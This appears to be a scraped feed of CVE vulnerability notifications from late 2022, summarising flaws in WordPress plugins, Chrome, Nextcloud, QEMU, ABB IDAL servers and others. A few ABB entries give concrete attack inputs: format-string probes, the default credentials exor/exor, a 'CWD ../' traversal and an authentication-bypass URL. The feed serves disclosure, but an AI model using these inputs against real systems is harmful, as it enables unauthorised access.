🚨 CVE-2022-2808Algan Yaz?l?m Prens Student Information System product has an authenticated Insecure Direct Object Reference (IDOR) vulnerability.🎖@cveNotify |
|
| 2022-12-02 14:48:29 |
🚨 CVE-2022-2807Algan Yazılım Prens Student Information System product has an unauthenticated SQL Injection vulnerability.🎖@cveNotify |
|
| 2022-12-02 14:48:28 |
🚨 CVE-2022-3847The Showing URL in QR Code WordPress plugin through 0.0.1 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin or editor add Stored XSS payloads via a CSRF attack🎖@cveNotify |
|
| 2022-12-02 14:48:24 |
🚨 CVE-2022-3865The WP User Merger WordPress plugin before 1.5.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin🎖@cveNotify |
|
| 2022-12-02 14:48:23 |
🚨 CVE-2022-3768The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author🎖@cveNotify |
|
| 2022-12-02 14:48:22 |
🚨 CVE-2022-3848The WP User Merger WordPress plugin before 1.5.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin🎖@cveNotify |
|
| 2022-12-02 14:48:21 |
🚨 CVE-2022-3849The WP User Merger WordPress plugin before 1.5.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin🎖@cveNotify |
|
| 2022-12-02 11:51:48 |
🚨 CVE-2022-40284A buffer overflow was discovered in NTFS-3G before 2022.10.3. Crafted metadata in an NTFS image can cause code execution. A local attacker can exploit this if the ntfs-3g binary is setuid root. A physically proximate attacker can exploit this if NTFS-3G software is configured to execute upon attachment of an external storage device.🎖@cveNotify |
|
| 2022-12-02 09:51:45 |
🚨 CVE-2022-4222A vulnerability was found in SourceCodester Canteen Management System. It has been rated as critical. This issue affects the function query of the file ajax_invoice.php of the component POST Request Handler. The manipulation of the argument search leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214523.🎖@cveNotify |
|
| 2022-12-02 09:51:44 |
🚨 CVE-2022-44096Sanitization Management System v1.0 was discovered to contain hardcoded credentials which allows attackers to escalate privileges and access the admin panel.🎖@cveNotify |
|
| 2022-12-02 09:51:43 |
🚨 CVE-2022-44097Book Store Management System v1.0 was discovered to contain hardcoded credentials which allows attackers to escalate privileges and access the admin panel.🎖@cveNotify |
|
| 2022-12-02 09:51:42 |
🚨 CVE-2022-4228A vulnerability classified as problematic has been found in SourceCodester Book Store Management System 1.0. This affects an unknown part of the file /bsms_ci/index.php/user/edit_user/. The manipulation of the argument password leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214587.🎖@cveNotify |
|
| 2022-12-02 09:51:40 |
🚨 CVE-2022-4229A vulnerability classified as critical was found in SourceCodester Book Store Management System 1.0. This vulnerability affects unknown code of the file /bsms_ci/index.php. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214588.🎖@cveNotify |
|
| 2022-12-02 09:51:39 |
🚨 CVE-2022-4232A vulnerability, which was classified as critical, was found in SourceCodester Event Registration System 1.0. Affected is an unknown function. The manipulation of the argument cmd leads to unrestricted upload. It is possible to launch the attack remotely. VDB-214590 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-02 09:51:38 |
🚨 CVE-2022-4177Use after free in Extensions in Google Chrome prior to 108.0.5359.71 allowed an attacker who convinced a user to install an extension to potentially exploit heap corruption via a crafted Chrome Extension and UI interaction. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-12-02 09:51:36 |
🚨 CVE-2022-4178Use after free in Mojo in Google Chrome prior to 108.0.5359.71 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-12-02 09:51:35 |
🚨 CVE-2022-4180Use after free in Mojo in Google Chrome prior to 108.0.5359.71 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted Chrome Extension. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-12-02 09:51:33 |
🚨 CVE-2022-4179Use after free in Audio in Google Chrome prior to 108.0.5359.71 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted Chrome Extension. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-12-02 09:51:32 |
🚨 CVE-2022-4181Use after free in Forms in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-12-02 09:51:31 |
🚨 CVE-2022-4182Inappropriate implementation in Fenced Frames in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to bypass fenced frame restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-12-02 09:51:30 |
🚨 CVE-2022-4183Insufficient policy enforcement in Popup Blocker in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-12-02 09:51:29 |
🚨 CVE-2022-4184Insufficient policy enforcement in Autofill in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to bypass autofill restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-12-02 09:51:27 |
🚨 CVE-2022-4174Type confusion in V8 in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-12-02 09:51:26 |
🚨 CVE-2022-4175Use after free in Camera Capture in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-12-02 09:51:25 |
🚨 CVE-2022-4176Out of bounds write in Lacros Graphics in Google Chrome on Chrome OS and Lacros prior to 108.0.5359.71 allowed a remote attacker who convinced a user to engage in specific UI interactions to potentially exploit heap corruption via UI interactions. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-12-02 09:51:24 |
🚨 CVE-2022-4185Inappropriate implementation in Navigation in Google Chrome on iOS prior to 108.0.5359.71 allowed a remote attacker to spoof the contents of the modal dialogue via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-12-02 09:51:23 |
🚨 CVE-2022-4186Insufficient validation of untrusted input in Downloads in Google Chrome prior to 108.0.5359.71 allowed an attacker who convinced a user to install a malicious extension to bypass Downloads restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-12-02 09:51:21 |
🚨 CVE-2022-4187Insufficient policy enforcement in DevTools in Google Chrome on Windows prior to 108.0.5359.71 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-12-02 00:47:50 |
🚨 CVE-2022-44212In GL.iNet Goodcloud 1.0, insecure design allows remote attacker to access devices' admin panel.🎖@cveNotify |
|
| 2022-12-02 00:47:49 |
🚨 CVE-2022-4032The Quiz and Survey Master plugin for WordPress is vulnerable to iFrame Injection via the 'question[id]' parameter in versions up to, and including, 8.0.4 due to insufficient input sanitization and output escaping that allowed iframe tags to be injected. This makes it possible for unauthenticated attackers to inject iFrames in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2022-12-02 00:47:47 |
🚨 CVE-2022-4033The Quiz and Survey Master plugin for WordPress is vulnerable to input validation bypass via the 'question[id]' parameter in versions up to, and including, 8.0.4 due to insufficient input validation that allows attackers to inject content other than the specified value (i.e. a number, file path, etc..). This makes it possible attackers to submit values other than the intended input type.🎖@cveNotify |
|
| 2022-12-02 00:47:46 |
🚨 CVE-2022-4035The Appointment Hour Booking plugin for WordPress is vulnerable to iFrame Injection via the ‘email’ or general field parameters in versions up to, and including, 1.3.72 due to insufficient input sanitization and output escaping that makes injecting iFrame tags possible. This makes it possible for unauthenticated attackers to inject iFrames when submitting a booking that will execute whenever a user accesses the injected booking details page.🎖@cveNotify |
|
| 2022-12-02 00:47:45 |
🚨 CVE-2022-4034The Appointment Hour Booking Plugin for WordPress is vulnerable to CSV Injection in versions up to, and including, 1.3.72. This makes it possible for unauthenticated attackers to embed untrusted input into content during booking creation that may be exported as a CSV file when a site's administrator exports booking details. This can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.🎖@cveNotify |
|
| 2022-12-02 00:47:43 |
🚨 CVE-2022-46148Discourse is an open-source messaging platform. In versions 2.8.10 and prior on the `stable` branch and versions 2.9.0.beta11 and prior on the `beta` and `tests-passed` branches, users composing malicious messages and navigating to drafts page could self-XSS. This vulnerability can lead to a full XSS on sites which have modified or disabled Discourse’s default Content Security Policy. This issue is patched in the latest stable, beta and tests-passed versions of Discourse.🎖@cveNotify |
|
| 2022-12-02 00:47:42 |
🚨 CVE-2022-46150Discourse is an open-source discussion platform. Prior to version 2.8.13 of the `stable` branch and version 2.9.0.beta14 of the `beta` and `tests-passed` branches, unauthorized users may learn of the existence of hidden tags and that they have been applied to topics that they have access to. This issue is patched in version 2.8.13 of the `stable` branch and version 2.9.0.beta14 of the `beta` and `tests-passed` branches. As a workaround, use the `disable_email` site setting to disable all emails to non-staff users.🎖@cveNotify |
|
| 2022-12-02 00:47:41 |
🚨 CVE-2022-4036The Appointment Hour Booking plugin for WordPress is vulnerable to CAPTCHA bypass in versions up to, and including, 1.3.72. This is due to the use of insufficiently strong hashing algorithm on the CAPTCHA secret that is also displayed to the user via a cookie.🎖@cveNotify |
|
| 2022-12-02 00:47:39 |
🚨 CVE-2022-36433The blog-post creation functionality in the Amasty Blog Pro 2.10.3 plugin for Magento 2 allows injection of JavaScript code in the short_content and full_content fields, leading to XSS attacks against admin panel users via posts/preview or posts/save.🎖@cveNotify |
|
| 2022-12-02 00:47:38 |
🚨 CVE-2022-23737An improper privilege management vulnerability was identified in GitHub Enterprise Server that allowed users with improper privileges to create or delete pages via the API. To exploit this vulnerability, an attacker would need to be added to an organization's repo with write permissions. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.7 and was fixed in versions 3.2.20, 3.3.15, 3.4.10, 3.5.7, and 3.6.3. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2022-12-02 00:47:37 |
🚨 CVE-2022-41968Nextcloud Server is an open source personal cloud server. Prior to versions 23.0.10 and 24.0.5, calendar name lengths are not validated before writing to a database. As a result, an attacker can send unnecessary amounts of data against the database. Version 23.0.10 and 24.0.5 contain patches for the issue. No known workarounds are available.🎖@cveNotify |
|
| 2022-12-02 00:47:36 |
🚨 CVE-2022-41969Nextcloud Server is an open source personal cloud server. Prior to versions 23.0.11, 24.0.7, and 25.0.0, there is no password length limit when creating a user as an administrator. An administrator can cause a limited DoS attack against their own server. Versions 23.0.11, 24.0.7, and 25.0.0 contain a fix for the issue. As a workaround, don't create user accounts with long passwords.🎖@cveNotify |
|
| 2022-12-02 00:47:34 |
🚨 CVE-2022-41970Nextcloud Server is an open source personal cloud server. Prior to versions 24.0.7 and 25.0.1, disabled download shares still allow download through preview images. Images could be downloaded and previews of documents (first page) can be downloaded without being watermarked. Versions 24.0.7 and 25.0.1 contain a fix for this issue. No known workarounds are available.🎖@cveNotify |
|
| 2022-12-02 00:47:33 |
🚨 CVE-2022-41971Nextcould Talk android is a video and audio conferencing app for Nextcloud. Prior to versions 12.2.8, 13.0.10, 14.0.6, and 15.0.0, guests can continue to receive video streams from a call after being removed from a conversation. An attacker would be able to see videos on a call in a public conversation after being removed from that conversation, provided that they were removed while being in the call. Versions 12.2.8, 13.0.10, 14.0.6, and 15.0.0 contain patches for the issue. No known workarounds are available.🎖@cveNotify |
|
| 2022-12-02 00:47:32 |
🚨 CVE-2022-42718Incorrect default permissions in the installation folder for NI LabVIEW Command Line Interface (CLI) may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2022-12-02 00:47:30 |
🚨 CVE-2022-4144An out-of-bounds read flaw was found in the QXL display device emulation in QEMU. The qxl_phys2virt() function does not check the size of the structure pointed to by the guest physical address, potentially reading past the end of the bar space into adjacent pages. A malicious guest user could use this flaw to crash the QEMU process on the host causing a denial of service condition.🎖@cveNotify |
|
| 2022-12-02 00:47:29 |
🚨 CVE-2022-4172An integer overflow and buffer overflow issues were found in the ACPI Error Record Serialization Table (ERST) device of QEMU in the read_erst_record() and write_erst_record() functions. Both issues may allow the guest to overrun the host buffer allocated for the ERST memory device. A malicious guest could use these flaws to crash the QEMU process on the host.🎖@cveNotify |
|
| 2022-12-02 00:47:28 |
🚨 CVE-2022-36962SolarWinds Platform was susceptible to Command Injection. This vulnerability allows a remote adversary with complete control over the SolarWinds database to execute arbitrary commands.🎖@cveNotify |
|
| 2022-12-02 00:47:26 |
🚨 CVE-2022-36964SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with valid access to SolarWinds Web Console to execute arbitrary commands.🎖@cveNotify |
|
| 2022-12-02 00:47:25 |
🚨 CVE-2022-44635Apache Fineract allowed an authenticated user to perform remote code execution due to a path traversal vulnerability in a file upload component of Apache Fineract, allowing an attacker to run remote code. This issue affects Apache Fineract version 1.8.0 and prior versions. We recommend users to upgrade to 1.8.1.🎖@cveNotify |
|
| 2022-12-01 22:47:55 |
🚨 CVE-2022-38900decode-uri-component 0.2.0 is vulnerable to Improper Input Validation resulting in DoS.🎖@cveNotify |
|
| 2022-12-01 22:47:54 |
🚨 CVE-2022-4020Vulnerability in the HQSwSmiDxe DXE driver on some consumer Acer Notebook devices may allow an attacker with elevated privileges to modify UEFI Secure Boot settings by modifying an NVRAM variable.🎖@cveNotify |
|
| 2022-12-01 22:47:53 |
🚨 CVE-2022-41912The crewjam/saml go library prior to version 0.4.9 is vulnerable to an authentication bypass when processing SAML responses containing multiple Assertion elements. This issue has been corrected in version 0.4.9. There are no workarounds other than upgrading to a fixed version.🎖@cveNotify |
|
| 2022-12-01 22:47:52 |
🚨 CVE-2022-41921Discourse is an open-source discussion platform. Prior to version 2.9.0.beta13, users can post chat messages of an unlimited length, which can cause a denial of service for other users when posting huge amounts of text. Users should upgrade to version 2.9.0.beta13, where a limit has been introduced. No known workarounds are available.🎖@cveNotify |
|
| 2022-12-01 22:47:51 |
🚨 CVE-2022-43589A null pointer dereference vulnerability exists in the handle_ioctl_8314C functionality of Callback technologies CBFS Filter 20.0.8317. A specially-crafted I/O request packet (IRP) can lead to denial of service. An attacker can issue an ioctl to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-01 22:47:49 |
🚨 CVE-2022-43590A null pointer dereference vulnerability exists in the handle_ioctl_0x830a0_systembuffer functionality of Callback technologies CBFS Filter 20.0.8317. A specially-crafted I/O request packet (IRP) can lead to denial of service. An attacker can issue an ioctl to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-01 22:47:48 |
🚨 CVE-2022-43588A null pointer dereference vulnerability exists in the handle_ioctl_83150 functionality of Callback technologies CBFS Filter 20.0.8317. A specially-crafted I/O request packet (IRP) can lead to denial of service. An attacker can issue an ioctl to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-01 22:47:47 |
🚨 CVE-2022-3383The Ultimate Member plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 2.5.0 via the get_option_value_from_callback function that accepts user supplied input and passes it through call_user_func(). This makes it possible for authenticated attackers, with administrative capabilities, to execute code on the server.🎖@cveNotify |
|
| 2022-12-01 22:47:46 |
🚨 CVE-2022-44355SolarView Compact 7.0 is vulnerable to Cross-site Scripting (XSS) via /network_test.php.🎖@cveNotify |
|
| 2022-12-01 22:47:45 |
🚨 CVE-2022-44279Garage Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via /garage/php_action/createBrand.php.🎖@cveNotify |
|
| 2022-12-01 22:47:44 |
🚨 CVE-2022-44354SolarView Compact 4.0 and 5.0 is vulnerable to Unrestricted File Upload via a crafted php file.🎖@cveNotify |
|
| 2022-12-01 22:47:42 |
🚨 CVE-2022-4027The Simple:Press plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'postitem' parameter manipulated during a forum response in versions up to, and including, 6.8 due to insufficient input sanitization and output escaping that makes injecting object and embed tags possible. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages when responding to forum threads that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2022-12-01 22:47:41 |
🚨 CVE-2022-3995The TeraWallet plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 1.4.3. This is due to insufficient validation of the user-controlled key on the lock_unlock_terawallet AJAX action. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to lock/unlock other users wallets.🎖@cveNotify |
|
| 2022-12-01 22:47:40 |
🚨 CVE-2022-39346Nextcloud server is an open source personal cloud server. Affected versions of nextcloud server did not properly limit user display names which could allow a malicious users to overload the backing database and cause a denial of service. It is recommended that the Nextcloud Server is upgraded to 22.2.10, 23.0.7 or 24.0.3. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2022-12-01 22:47:39 |
🚨 CVE-2022-45939GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the ctags program. For example, a victim may use the "ctags *" command (suggested in the ctags documentation) in a situation where the current working directory has contents that depend on untrusted input.🎖@cveNotify |
|
| 2022-12-01 22:47:35 |
🚨 CVE-2022-45934An issue was discovered in the Linux kernel through 6.0.10. l2cap_config_req in net/bluetooth/l2cap_core.c has an integer wraparound via L2CAP_CONF_REQ packets.🎖@cveNotify |
|
| 2022-12-01 22:47:34 |
🚨 CVE-2022-41156Remote code execution vulnerability due to insufficient verification of URLs, etc. in OndiskPlayerAgent. A remote attacker could exploit the vulnerability to cause remote code execution by causing an arbitrary user to download and execute malicious code.🎖@cveNotify |
|
| 2022-12-01 22:47:33 |
🚨 CVE-2022-41157A specific file on the sERP server if Kyungrinara(ERP solution) has a fixed password with the SYSTEM authority. This vulnerability could allow attackers to leak or steal sensitive information or execute malicious commands.🎖@cveNotify |
|
| 2022-12-01 22:47:32 |
🚨 CVE-2022-3896The WP Affiliate Platform plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER["REQUEST_URI"] in versions up to, and including, 6.3.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This is unlikely to work in modern browsers.🎖@cveNotify |
|
| 2022-12-01 22:47:31 |
🚨 CVE-2022-43705In Botan before 2.19.3, it is possible to forge OCSP responses due to a certificate verification error. This issue was introduced in Botan 1.11.34 (November 2016).🎖@cveNotify |
|
| 2022-12-01 14:01:51 |
🚨 CVE-2022-3270In multiple products by Festo a remote unauthenticated attacker could use functions of an undocumented protocol which could lead to a complete loss of confidentiality, integrity and availability.🎖@cveNotify |
|
| 2022-12-01 12:02:04 |
🚨 CVE-2022-45050A reflected XSS vulnerability has been found in Axiell Iguana CMS, allowing an attacker to execute code in a victim's browser. The title parameter on the twitter.php endpoint does not properly neutralise user input, resulting in the vulnerability.🎖@cveNotify |
|
| 2022-12-01 12:02:03 |
🚨 CVE-2022-4247A vulnerability classified as critical was found in Movie Ticket Booking System. This vulnerability affects unknown code of the file booking.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214624.🎖@cveNotify |
|
| 2022-12-01 12:01:59 |
🚨 CVE-2022-4249A vulnerability, which was classified as problematic, was found in Movie Ticket Booking System. Affected is an unknown function of the component POST Request Handler. The manipulation of the argument ORDER_ID leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-214626 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-01 12:01:58 |
🚨 CVE-2022-4251A vulnerability was found in Movie Ticket Booking System and classified as problematic. Affected by this issue is some unknown functionality of the file editBooking.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214628.🎖@cveNotify |
|
| 2022-12-01 12:01:57 |
🚨 CVE-2022-4252A vulnerability was found in SourceCodester Canteen Management System. It has been classified as problematic. This affects the function builtin_echo of the file categories.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-214629 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-01 12:01:53 |
🚨 CVE-2022-42919Python 3.9.x and 3.10.x through 3.10.8 on Linux allows local privilege escalation in a non-default configuration. The Python multiprocessing library, when used with the forkserver start method on Linux, allows pickles to be deserialized from any user in the same machine local network namespace, which in many system configurations means any user on the same machine. Pickles can execute arbitrary code. Thus, this allows for local user privilege escalation to the user that any forkserver process is running as. Setting multiprocessing.util.abstract_sockets_supported to False is a workaround. The forkserver start method for multiprocessing is not the default start method. This issue is Linux specific because only Linux supports abstract namespace sockets. CPython before 3.9 does not make use of Linux abstract namespace sockets by default. Support for users manually specifying an abstract namespace socket was added as a bugfix in 3.7.8 and 3.8.4, but users would need to make specific uncommon API calls in order to do that in CPython before 3.9.🎖@cveNotify |
|
| 2022-12-01 12:01:52 |
🚨 CVE-2022-39283FreeRDP is a free remote desktop protocol library and clients. All FreeRDP based clients when using the `/video` command line switch might read uninitialized data, decode it as audio/video and display the result. FreeRDP based server implementations are not affected. This issue has been patched in version 2.8.1. If you cannot upgrade do not use the `/video` switch.🎖@cveNotify |
|
| 2022-12-01 12:01:51 |
🚨 CVE-2022-36431An arbitrary file upload vulnerability in Rocket TRUfusion Enterprise before 7.9.6.1 allows unauthenticated attackers to execute arbitrary code via a crafted JSP file. Issue fixed in version 7.9.6.1.🎖@cveNotify |
|
| 2022-12-01 07:02:04 |
🚨 CVE-2022-40489ThinkCMF version 6.0.7 is affected by a Cross Site Request Forgery (CSRF) vulnerability that allows a Super Administrator user to be injected into administrative users.🎖@cveNotify |
|
| 2022-12-01 07:02:03 |
🚨 CVE-2022-40849ThinkCMF version 6.0.7 is affected by Stored Cross-Site Scripting (XSS). An attacker who successfully exploited this vulnerability could inject a Persistent XSS payload in the Slideshow Management section that execute arbitrary JavaScript code on the client side, e.g., to steal the administrator's PHP session token (PHPSESSID).🎖@cveNotify |
|
| 2022-12-01 07:02:02 |
🚨 CVE-2022-44262ff4j 1.8.1 is vulnerable to Remote Code Execution (RCE).🎖@cveNotify |
|
| 2022-12-01 07:01:58 |
🚨 CVE-2022-45640Tenda Tenda AC6V1.0 V15.03.05.19 is affected by buffer overflow. Causes a denial of service (local).🎖@cveNotify |
|
| 2022-12-01 07:01:57 |
🚨 CVE-2022-44295Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/orders/assign_team.php?id=.🎖@cveNotify |
|
| 2022-12-01 07:01:56 |
🚨 CVE-2022-44296Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/quotes/manage_remark.php?id=.🎖@cveNotify |
|
| 2022-12-01 02:01:57 |
🚨 CVE-2022-41040Microsoft Exchange Server Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2022-12-01 02:01:56 |
🚨 CVE-2020-15503LibRaw before 0.20-RC1 lacks a thumbnail size range check. This affects decoders/unpack_thumb.cpp, postprocessing/mem_image.cpp, and utils/thumb_utils.cpp. For example, malloc(sizeof(libraw_processed_image_t)+T.tlength) occurs without validating T.tlength.🎖@cveNotify |
|
| 2022-12-01 00:02:14 |
🚨 CVE-2019-6547Delta Industrial Automation CNCSoft, CNCSoft ScreenEditor Version 1.00.84 and prior. An out-of-bounds read vulnerability may cause the software to crash due to lacking user input validation for processing project files.🎖@cveNotify |
|
| 2022-12-01 00:02:13 |
🚨 CVE-2019-3901A race condition in perf_event_open() allows local attackers to leak sensitive data from setuid programs. As no relevant locks (in particular the cred_guard_mutex) are held during the ptrace_may_access() call, it is possible for the specified target task to perform an execve() syscall with setuid execution before perf_event_alloc() actually attaches to it, allowing an attacker to bypass the ptrace_may_access() check and the perf_event_exit_task(current) call that is performed in install_exec_creds() during privileged execve() calls. This issue affects kernel versions before 4.8.🎖@cveNotify |
|
| 2022-12-01 00:02:12 |
🚨 CVE-2019-3893In Foreman it was discovered that the delete compute resource operation, when executed from the Foreman API, leads to the disclosure of the plaintext password or token for the affected compute resource. A malicious user with the "delete_compute_resource" permission can use this flaw to take control over compute resources managed by foreman. Versions before 1.20.3, 1.21.1, 1.22.0 are vulnerable.🎖@cveNotify |
|
| 2022-12-01 00:02:08 |
🚨 CVE-2019-7304Canonical snapd before version 2.37.1 incorrectly performed socket owner validation, allowing an attacker to run arbitrary commands as root. This issue affects: Canonical snapd versions prior to 2.37.1.🎖@cveNotify |
|
| 2022-12-01 00:02:07 |
🚨 CVE-2019-6835A Cross-Site Scripting (XSS) CWE-79 vulnerability exists in U.motion Server (MEG6501-0001 - U.motion KNX server, MEG6501-0002 - U.motion KNX Server Plus, MEG6260-0410 - U.motion KNX Server Plus, Touch 10, MEG6260-0415 - U.motion KNX Server Plus, Touch 15), which could allow an attacker to inject client-side script when a user visits a web page.🎖@cveNotify |
|
| 2022-12-01 00:02:06 |
🚨 CVE-2019-6837A Server-Side Request Forgery (SSRF): CWE-918 vulnerability exists in U.motion Server (MEG6501-0001 - U.motion KNX server, MEG6501-0002 - U.motion KNX Server Plus, MEG6260-0410 - U.motion KNX Server Plus, Touch 10, MEG6260-0415 - U.motion KNX Server Plus, Touch 15), which could cause server configuration data to be exposed when an attacker modifies a URL.🎖@cveNotify |
|
| 2022-12-01 00:02:03 |
🚨 CVE-2019-6840A Format String: CWE-134 vulnerability exists in U.motion Server (MEG6501-0001 - U.motion KNX server, MEG6501-0002 - U.motion KNX Server Plus, MEG6260-0410 - U.motion KNX Server Plus, Touch 10, MEG6260-0415 - U.motion KNX Server Plus, Touch 15), which could allow an attacker to send a crafted message to the target server, thereby causing arbitrary commands to be executed.🎖@cveNotify |
|
| 2022-12-01 00:02:02 |
🚨 CVE-2019-6957A recently discovered security vulnerability affects all Bosch Video Management System (BVMS) versions 9.0 and below, DIVAR IP 2000, 3000, 5000 and 7000, Video Recording Manager (VRM), Video Streaming Gateway (VSG), Configuration Manager, Building Integration System (BIS) with Video Engine, Access Professional Edition (APE), Access Easy Controller (AEC), Bosch Video Client (BVC) and Video SDK (VSDK). The vulnerability potentially allows the unauthorized execution of code in the system via the network interface.🎖@cveNotify |
|
| 2022-12-01 00:02:01 |
🚨 CVE-2019-7228The ABB IDAL HTTP server mishandles format strings in a username or cookie during the authentication process. Attempting to authenticate with the username %25s%25p%25x%25n will crash the server. Sending %08x.AAAA.%08x.%08x will log memory content from the stack.🎖@cveNotify |
|
| 2022-12-01 00:02:00 |
🚨 CVE-2019-7232The ABB IDAL HTTP server is vulnerable to a buffer overflow when a long Host header is sent in a web request. The Host header value overflows a buffer and overwrites a Structured Exception Handler (SEH) address. An unauthenticated attacker can submit a Host header value of 2047 bytes or more to overflow the buffer and overwrite the SEH address, which can then be leveraged to execute attacker-controlled code on the server.🎖@cveNotify |
|
| 2022-12-01 00:01:56 |
🚨 CVE-2019-7227In the ABB IDAL FTP server, an authenticated attacker can traverse to arbitrary directories on the hard disk with "CWD ../" and then use the FTP server functionality to download and upload files. An unauthenticated attacker can take advantage of the hardcoded or default credential pair exor/exor to become an authenticated attacker.🎖@cveNotify |
|
| 2022-12-01 00:01:55 |
🚨 CVE-2019-7226The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass authentication and gain access to privileged functions. Specifically, /cgi/loginDefaultUser creates a session in an authenticated state and returns the session ID along with what may be the username and cleartext password of the user. An attacker can then supply an IDALToken value in a cookie, which will allow them to perform privileged operations such as restarting the service with /cgi/restart. A GET request to /cgi/loginDefaultUser may result in "1 #S_OK IDALToken=532c8632b86694f0232a68a0897a145c admin admin" or a similar response.🎖@cveNotify |
|
| 2022-12-01 00:01:54 |
🚨 CVE-2019-14824A flaw was found in the 'deref' plugin of 389-ds-base where it could use the 'search' permission to display attribute values. In some configurations, this could allow an authenticated attacker to view private attributes, such as password hashes.🎖@cveNotify |
|
| 2022-11-30 22:02:19 |
🚨 CVE-2022-45931A SQL injection issue was discovered in AAA in OpenDaylight (ODL) before 0.16.5. The aaa-idm-store-h2/src/main/java/org/opendaylight/aaa/datastore/h2/UserStore.java deleteUser function is affected when the API interface /auth/v1/users/ is used.🎖@cveNotify |
|
| 2022-11-30 22:02:18 |
🚨 CVE-2022-45868The web-based admin console in H2 Database Engine through 2.1.214 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states "This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that."🎖@cveNotify |
|
| 2022-11-30 22:02:17 |
🚨 CVE-2022-45932A SQL injection issue was discovered in AAA in OpenDaylight (ODL) before 0.16.5. The aaa-idm-store-h2/src/main/java/org/opendaylight/aaa/datastore/h2/RoleStore.java deleteRole function is affected when the API interface /auth/v1/roles/ is used.🎖@cveNotify |
|
| 2022-11-30 22:02:16 |
🚨 CVE-2022-45872iTerm2 before 3.4.18 mishandles a DECRQSS response.🎖@cveNotify |
|
| 2022-11-30 22:02:15 |
